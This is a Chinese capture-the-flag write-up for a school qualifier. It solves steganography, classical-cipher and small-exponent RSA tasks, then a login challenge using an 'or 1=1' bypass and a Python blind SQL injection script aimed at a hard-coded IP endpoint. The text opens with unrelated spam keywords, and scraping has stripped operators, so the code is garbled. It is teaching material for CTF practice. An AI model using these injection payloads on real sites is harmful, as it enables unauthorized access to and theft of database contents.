旅游网站建设方案两百字,无锡机关单位建设网站,wordpress 修改链接,成都私人借钱空放私人目录 前言MISC签到题_熟悉吗又来一道签到题文件包含 CRYPTO古典1古典2RSA webbaby_sql 前言
[HFNU 校级选拔] 已经结束#xff0c;接下来一起了解下题目是怎么做的。 通过网盘分享的文件#xff1a;ARCHPR_4.66.266.0_汉化绿色版.7z 链接: https://pan.baidu.com/s/1N_c0PJX… 目录 前言MISC签到题_熟悉吗又来一道签到题文件包含 CRYPTO古典1古典2RSA webbaby_sql 前言
[HFNU 校级选拔] 已经结束接下来一起了解下题目是怎么做的。 通过网盘分享的文件ARCHPR_4.66.266.0_汉化绿色版.7z 链接: https://pan.baidu.com/s/1N_c0PJXb8ICkzWfHo98QHQ?pwdev3k 提取码: ev3k
MISC
签到题_熟悉吗 打开压缩包发现里面是一个MP3文件和一个key值为syclovergeek初步判断是mp3隐写于是把它拖到工具MP3Stego目录下 然后在当前路径下进入命令行使用工具解密
.\Decode.exe -X -P syclovergeek shuxidetimu.mp3之后在该目录下得到一个文件shuxidetimu.mp3.txt打开得到flag flagSYC{Mp3_B15b1uBiu_W0W}
又来一道签到题
这一题给了一个jpg图片将它拖入010中发现字符串 将该字符串进行base32解密 得到flagflag{6f1797d4080b29b64da5897780463e30}
文件包含
拿到题目是一个MP4对它进行binwalk分析发现里面很多压缩包压缩了很多图片 010也是如此可以发现里面有很多压缩包 于是将Are_you_ok_.mp4改为Are_you_ok_.zip并解压缩得到很多图片同时发现hint 只有65.jpg无法正常回显我们将它拖入010 发现文件头很想rar格式的文件头因此更改文件头为 保存更改并将后缀改为rar再次打开发现需要密码 由于是RAR5旧版ARCHPR无法爆破RAR5的密码新版ARCHPR可以尝试用掩码爆破需要新版的可以找前言里的网盘工具 解压之后得到一个flag文件无法打开 将它拖入010中发现是png图片于是将它的后缀改为png即可打开图片 flag如图 CRYPTO
古典1
打开txt文件得到一串字符S1ZKVUNTQ1FJNUpYV1ZDVEpGSEVPVENSS05FVklSU0tKRklFQ1YyUUlGREZPV0NCS0JIVktWMkdKNUlFNlNLUUtSRVVNVkNWS0JFVk9TS0dLUklFU1JTSktCNlE9PT09
将它拖入cyberchef点击魔棒 发现是一层base64解密并得到了下一层字符串 点击魔棒发现是一层base32解密并得到了下一层字符串并且该字符串极其接近flag 从题目描述中我们知道flag格式为HFNUCTF从H到U移动了13个单位的字符并且之后的SAHPGS移动了13个单位的字符后分别对应FNUCTF由此可得最后一层加密是凯撒加密偏移量为13。 flag为HFNUCTF{GFVATYDFVGSWVCNJCNSJKNCBHJSBCBVCGVSGHCVJVSGCVSVC}
古典2
打开txt文件得到一串字符
RktmbWZfZGg4emNIU1R7c2Z1ZGx1enVqemY3dXVydXJaSGVqZG1pZGNqfQ
特征明显为base64加密我们将它拖入cyberchef 此处已经出现了flag的部分特征 “{}” 再结合提示中 “大括号的位置很重要并且字符串格式为HFNUCTF{}” 我们可以知道现在要做的是找到能够改变{}位置的加密方式因为大部分古典加密出现的较早当时并不存在”{}“这种字符因此在加解密的时候遇到这种字符串往往采取不处理的方式但是栅栏密码Rail-Fence Cipher会改变字符串的位置“{}”也不例外。所以我们这里尝试栅栏解密目的是将“{”移到正确的位置上即第8个字符串的位置。 经过简单的一两次尝试后得到当key为3时“{”出现在了正确的位置并且“}”也闭合在了末尾。
此时进行凯撒解密在尝试了24次后发现无法得到flag说明还套了一层额外的加密我们先尝试atbash密码 之后再尝试凯撒加密 当偏移量为13时成功得到了flagflag值为HFNUCTF{huihasdjhbjs_nasjdenfhj78sksnvdskv}
RSA
打开附件发现已知n,c,e,由于n很大我们无法通过因式分解得到p和q需要想其他办法来解决。仔细观察我们发现本题的e很小值为3。
当m3比n还小就有
c msup3/sup mod n -- c msup3/sup当m3大于n就有
c msup3/sup - kn -- msup3/sup c kn因此爆破k当c kn可以被开三次方就可以得到明文m。 exp如下
import gmpy2
from Crypto.Util.number import *def de(c, e, n):k 0while True:m c n*kresult, flag gmpy2.iroot(m, e)if True flag:return resultk 1e 3
n 691316677109436623113422493782665795857921917893759942123087462879884062720557906429183155859597756890896192044003240821906332575292476160072039505771794531255542244123516929671277306361467074545720823735806308003091983427678300287709469582282466572230066580195227278214776280213722215953097747453437289734469454712426107967188109548966907237877840316009828476200388327329144783877033491238709954473809991152727333616022406517443130542713167206421787038596312975153165848625721911080561242646092299016802662913017071685740548699163836007474224715426587609549372289181977830092677128368806113131459831182390520942892670696447128631485606579943885812260640805756035377584155135770155915782120025116486061540105139339655722904721294629149025033066823599823964444620779259106176913478839370100891213072100063101232635183636552360952762838656307300621195248059253614745118852163569388418086291748805100175008658387803878200034840215506516715640621165661642177371863874586069524022258642915100615596032443145034847031564356671559179212705466145609698475546210994748949121359853094247990533075004393534565421776468785821261291309463205314057882016266066365636018084499158806717036972590848458891019171583268920180691221168453612029698510271
c 3442467842482561323703237574537907554035337622762971103210557480050349359873041624336261782731509068910003360547049942482415036862904844600484976674423604861710166033558576921438068555951948966099658902606725292551952345193132973996288566246138708754810511646811362017769063041425115712305629748341207792305694590742066971202523405301561233341991037374101265623265332070787449332991792097090044761973705909217137119649091313457206589803479797894924402017273543719924849592070328396276760381501612934039653mde(c,e,n)
print(m)
print(long_to_bytes(m))
#运行得到结果bflag{4c466c3d0949118a3ca3319b43fe792bef9e94a19c8f666d2ec6c890034d88ba}因此flag为 flag{4c466c3d0949118a3ca3319b43fe792bef9e94a19c8f666d2ec6c890034d88ba}
web
baby_sql
这是一道sql盲注题我们先尝试使用万能密码 or 11#得到了假的flag 所以需要尝试sql注入。
exp如下
import requestsburp0_url http://39.104.206.54:8080/login.php
burp0_cookies {PHPSESSID: 5703888b277338746d9f4292645d23a7}
burp0_headers {Accept-Encoding: gzip, deflate, Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7, Accept-Language: zh-CN,zh;q0.9, Upgrade-Insecure-Requests: 1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36, Origin: http://182.44.3.106:44556, Pragma: no-cache, Cache-Control: no-cache, Referer: http://182.44.3.106:44556/login.php, Content-Type: application/x-www-form-urlencoded}
burp0_data {username: 1, password: admin}# 枚举当前数据库名的payload
payload_db 1 or ascii(substr((select database()) from {} for 1)){}## 枚举所有表名的payload
payload_tab 1 or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema{}) from {} for 1)){}## 枚举所有列名的payload
payload_com 1 or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema{}) from {} for 1)){}## 枚举字符的payload
payload_str 1 or ascii(substr((select {} from user) from {} for 1)){}## 判断长度的payload
payload_len_db 1 or length((select database())){}#
payload_len_tab 1 or length((select group_concat(table_name) from information_schema.tables where table_schema{})){}#
payload_len_com 1 or length((select group_concat(column_name) from information_schema.columns where table_schema{})){}#
payload_len_str 1 or length((select {} from {})){}#def fuzz():len 0db for i in range(1,100):burp0_data[username] payload_len_db.format(i)response requests.post(burp0_url, headersburp0_headers, cookiesburp0_cookies, databurp0_data)if 帐号或密码错误 not in response.text:print(f[] 数据库名长度为: {i})len ibreakfor i in range(1,len1):for n in range(32,128):burp0_data[username] payload_db.format(i,n)response requests.post(burp0_url, headersburp0_headers, cookiesburp0_cookies, databurp0_data)if 帐号或密码错误 not in response.text:db chr(n)print([] 第, i, 个字符枚举成功,db)breakprint()for i in range(1,100):burp0_data[username] payload_len_tab.format(db,i)response requests.post(burp0_url, headersburp0_headers, cookiesburp0_cookies, databurp0_data)if 帐号或密码错误 not in response.text:print(f[] 表名长度为: {i})len ibreaktab for i in range(1,len1):for n in range(32,128):burp0_data[username] payload_tab.format(db,i,n)response requests.post(burp0_url, headersburp0_headers, cookiesburp0_cookies, databurp0_data)if 帐号或密码错误 not in response.text:tab chr(n)print([] 第, i, 个字符枚举成功,tab)breakprint()for i in range(1,100):burp0_data[username] payload_len_com.format(db,i)response requests.post(burp0_url, headersburp0_headers, cookiesburp0_cookies, databurp0_data)if 帐号或密码错误 not in response.text:print(f[] 列名长度为: {i})len ibreakcom for i in range(1,len1):for n in range(32,128):burp0_data[username] payload_com.format(db,i,n)response requests.post(burp0_url, headersburp0_headers, cookiesburp0_cookies, databurp0_data)if 帐号或密码错误 not in response.text:com chr(n)print([] 第, i, 个字符枚举成功,com)breakprint()com input([*] 请输入要猜解的列: )for i in range(1,100):burp0_data[username] payload_len_str.format(com,tab,i)response requests.post(burp0_url, headersburp0_headers, cookiesburp0_cookies, databurp0_data)if 帐号或密码错误 not in response.text:print(f[] 字段长度为: {i})len ibreakstr for i in range(1,len1):for n in range(32,128):burp0_data[username] payload_str.format(com,i,n)response requests.post(burp0_url, headersburp0_headers, cookiesburp0_cookies, databurp0_data)if 帐号或密码错误 not in response.text:str chr(n)print([] 第, i, 个字符枚举成功,str)breakprint()com input([*] 请输入要猜解的列: )for i in range(1,100):burp0_data[username] payload_len_str.format(com,tab,i)response requests.post(burp0_url, headersburp0_headers, cookiesburp0_cookies, databurp0_data)if 帐号或密码错误 not in response.text:print(f[] 字段长度为: {i})len ibreakstr for i in range(1,len1):for n in range(32,128):burp0_data[username] payload_str.format(com,i,n)response requests.post(burp0_url, headersburp0_headers, cookiesburp0_cookies, databurp0_data)if 帐号或密码错误 not in response.text:str chr(n)print([] 第, i, 个字符枚举成功,str)breakif __name__ __main__:fuzz()拿到账号密码后登陆源码里有flag
